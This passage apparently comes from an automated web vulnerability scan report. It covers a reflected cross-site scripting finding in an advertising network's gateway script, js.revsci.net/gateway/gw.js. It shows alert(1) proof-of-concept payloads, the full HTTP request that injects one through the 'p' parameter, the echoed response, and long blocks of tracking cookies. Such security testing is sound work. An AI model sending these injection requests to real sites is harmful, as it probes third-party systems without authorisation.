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; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_POOa="MLsXtSHtJzpvJ5G+ytKgurD8xZbguKBAUoXMlOhbDZEIyUnXvCY/f7eEYgF17PuoYfq5CEudAjRL1GbcO/7J60JGGit5YpjkTi94QZ++NpMovzSXDH2egifUZfAGA4x6DJ1ef7CxdWNM1Ath6aEIxixI6X+ZFnchP7su1AfMVdmbt4uXOwFbARuez9yGUILljsr8iZpbE0YOpDX/I8dVzRiqWCbJWrig0+Ygf+aONwJLVAG9Qci4qyJ0OEoyF/C9WVXIsdxjo58DG+M5Z24kOQTzZzl9WL1fBtLwQMgZBQn3zjpdo1exh0bsmOsoJq0J12qVAbFThsQz5IDt7CkQiyleF6OSs84OYdv+QMiLgpV9FRrdszNyJ1Z1zdWSL2eBUsGyJ9LgmSypFoj2IJYq+CYjKuJh1q5SotTKfyoRjtQMIlYaw1bYORoY2KsywkRFoyeuXaDHr+kubAEaiR4mv+ueQqOTBqIL8EaJVKNeK14CvyaGEGiOf4xVidLPtWVp2cvmx+x8USaJltoPt52X7Qo3G9b5gMMSX/O7j4QHvGs068mYD7Jt0w3zVBoiChmjJijUOZI7pBIcB7pcDyhPXu0ekU8FNf+EZ2maUs/pJNfuLWhxzdwV8IFJvoDuP/k2F1fAFaKV5m3tJu4Kbsthsmobn+AEKG1fmaDEW/Rl9s4FMKHX6d1NaUg1aGoUNW9vlSNUkNQyg5xbyIqlIG60UCqagEd7akjIlHqEKgyVPmZRXCZsks8KUgS+ggIDyN3nm8Q9ybV7DYPDsaMVL9l30qTRehQMpViyu4aazqatyngUryJYSDMAw3MoxCYvzLg4VI0yQpDT4YM7EL/sjZF3GBKEvexarBUJ8IhXSEgBy8YPlIb7J1fU36Xok+aMd7hKisl1fiJ5L9WWlvPngVsNahS23h2ilcpGbvT7P8I1H67JHJs0T5zOxlbKA0tgt1XwzumjmY1MFQG7npmmjsejndnQNq6/1ECJ9acOs9TLs4eapvNZQ+7+XrqZbKo7Bg0R+TcmXPDWqHBSsNSRS6PEPs+B0Hn8vC43OULFX/VMEqBD7Um7K4PkKLzZ45EK/e7fMS47h1FG+y0pSm42Y6HkNkhnxCrDjBcgROJzznpsuIbJZQHyXl8j4cUgGiZBxqQSPqhFr9mtghL4GOwp2YKJAlwRxM+bjbCTXIMg2izcge98/uLVSVc1qMa6m03veDkqyKsoaPFeEkA2OOgtvIAoNV11Moc2Q+7bMZeZl4CDzl94tevQyhvCzcZDWHw1CA4qMQBfMOZr4xEG93vu+i9zYjr9xG1HA/txVLLWfK/bAKKmN6fqLbcY2pW5lpqW2FJxi65P63qhCJt0YP0gMlFmQMsihPn4MV2v59cKlKSELXAgqbss7TVL5/B0TuuGU260dpfoFfufumXLCpyIlXH1DRvhprlFYuymPmKAKQrrAUgRzvmuXaEHlH5jRUx1uEFjhqo7hOpqY+eQR+el8zb4xYyA0B3Fjnz5zUZGXZEUOHOUu5GVkR50a/qnzLWhgVLpMsIBeAsDZwR2196JkcyvgVxTSCglY6cvfSw1V+yzCTCmcXLsyRIBE5QZz41zi2x/Bw=="; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 28 Jun 2011 01:23:05 GMT
Cache-Control: max-age=86400, private
Expires: Wed, 29 Jun 2011 01:23:05 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 28 Jun 2011 01:23:04 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "H07710890E0<SCRIPT>ALERT(1)</SCRIPT>C10FC05E5CE" was not recognized.
*/

1.309. http://js.revsci.net/gateway/gw.js [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4905e'%3balert(1)//b2159deb7e7 was submitted in the p parameter. This input was echoed as 4905e';alert(1)//b2159deb7e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=432&vid=6127792&pid=456378&pli=2120305&sid=1887835&ali=3130307&cid=9518378&p=2754905e'%3balert(1)//b2159deb7e7&ref=http%3A//d.tradex.openx.com/afr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Di& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=1887835
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_POOa="MLsXtSHtJzpvJ5G+ytKgurD8xZbguKBAUoXMlOhbDZEIyUnXvCY/f7eEYgF17PuoYfq5CEudAjRL1GbcO/7J60JGGit5YpjkTi94QZ++NpMovzSXDH2egifUZfAGA4x6DJ1ef7CxdWNM1Ath6aEIxixI6X+ZFnchP7su1AfMVdmbt4uXOwFbARuez9yGUILljsr8iZpbE0YOpDX/I8dVzRiqWCbJWrig0+Ygf+aONwJLVAG9Qci4qyJ0OEoyF/C9WVXIsdxjo58DG+M5Z24kOQTzZzl9WL1fBtLwQMgZBQn3zjpdo1exh0bsmOsoJq0J12qVAbFThsQz5IDt7CkQiyleF6OSs84OYdv+QMiLgpV9FRrdszNyJ1Z1zdWSL2eBUsGyJ9LgmSypFoj2IJYq+CYjKuJh1q5SotTKfyoRjtQMIlYaw1bYORoY2KsywkRFoyeuXaDHr+kubAEaiR4mv+ueQqOTBqIL8EaJVKNeK14CvyaGEGiOf4xVidLPtWVp2cvmx+x8USaJltoPt52X7Qo3G9b5gMMSX/O7j4QHvGs068mYD7Jt0w3zVBoiChmjJijUOZI7pBIcB7pcDyhPXu0ekU8FNf+EZ2maUs/pJNfuLWhxzdwV8IFJvoDuP/k2F1fAFaKV5m3tJu4Kbsthsmobn+AEKG1fmaDEW/Rl9s4FMKHX6d1NaUg1aGoUNW9vlSNUkNQyg5xbyIqlIG60UCqagEd7akjIlHqEKgyVPmZRXCZsks8KUgS+ggIDyN3nm8Q9ybV7DYPDsaMVL9l30qTRehQMpViyu4aazqatyngUryJYSDMAw3MoxCYvzLg4VI0yQpDT4YM7EL/sjZF3GBKEvexarBUJ8IhXSEgBy8YPlIb7J1fU36Xok+aMd7hKisl1fiJ5L9WWlvPngVsNahS23h2ilcpGbvT7P8I1H67JHJs0T5zOxlbKA0tgt1XwzumjmY1MFQG7npmmjsejndnQNq6/1ECJ9acOs9TLs4eapvNZQ+7+XrqZbKo7Bg0R+TcmXPDWqHBSsNSRS6PEPs+B0Hn8vC43OULFX/VMEqBD7Um7K4PkKLzZ45EK/e7fMS47h1FG+y0pSm42Y6HkNkhnxCrDjBcgROJzznpsuIbJZQHyXl8j4cUgGiZBxqQSPqhFr9mtghL4GOwp2YKJAlwRxM+bjbCTXIMg2izcge98/uLVSVc1qMa6m03veDkqyKsoaPFeEkA2OOgtvIAoNV11Moc2Q+7bMZeZl4CDzl94tevQyhvCzcZDWHw1CA4qMQBfMOZr4xEG93vu+i9zYjr9xG1HA/txVLLWfK/bAKKmN6fqLbcY2pW5lpqW2FJxi65P63qhCJt0YP0gMlFmQMsihPn4MV2v59cKlKSELXAgqbss7TVL5/B0TuuGU260dpfoFfufumXLCpyIlXH1DRvhprlFYuymPmKAKQrrAUgRzvmuXaEHlH5jRUx1uEFjhqo7hOpqY+eQR+el8zb4xYyA0B3Fjnz5zUZGXZEUOHOUu5GVkR50a/qnzLWhgVLpMsIBeAsDZwR2196JkcyvgVxTSCglY6cvfSw1V+yzCTCmcXLsyRIBE5QZz41zi2x/Bw=="; rsi_us_1000000="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"; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rtc_k8KG=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; rsi_segs_1000000=pUP94zmhOXMMH/C1v6FY5BD9CU6duy7ESpLgzGDKYyViGwmWW18bAQsYoAM+8HjFdJtFJWRCiLHBLDbWsPcI86yrtpktmfFacilUsrkfIWWKJiDdQnsDK82st/RBdHlSiCArToI74iBMHEIM6aRZ+ctyPyV2AcskZoa93bnD+7KzmMsYNaQWBrrYkNUezvQnLXGkhVG05Odz4K2YkQ7efGHGdJsOKQEkcQBYjtqaS6H7ZlDNGWHeUbBT+7iWjqkltSlqdFkY5ZCSD/LpMe6oE2LhWxsHk9CQb4f/4DBRvVR+Vsn3Wa2otHHl9DcyWQkxt+HNZk80xAqzN7umu7qJn1io7bu4IlqZWRAwUL/2riYdQyqUN2xVKYYypoVq1rD+CHWBoax0NCsrkHXbllfg48mnErvVtscNhDauRsHqShGST1ntuJP8Y2uTzuL21JyFn9D8BzYJI7XWgqgHY3hwgF1X4Spu79NlxqFyDqacIxYDmgj/c/80HbjalDyO2MjzVEQUdlANyAYn0j8EbYmxQKxsM6Rx3taFnmBYEmerFK8BfqeoKPoaXWO+nwv0ryXCZUva1SDjlo2wVhjQ76dAQ1KhNRC+7n6erq2kuZ1UHS7gGJ+a8IPLnbMauEqtWz/vfr9PAbndBB364psLhQxsNBZ/V+G5/rjrxQ6XCrYppz+AmSwLTlzgnXYOZE+rGQrANefuO3zqAEj7Orx7bW+c7SVq/vKvEfxbwhQK4Bb0D6+TT7bmiEPzBBOMjJtdSmdMA/UlA/1ADQ==; 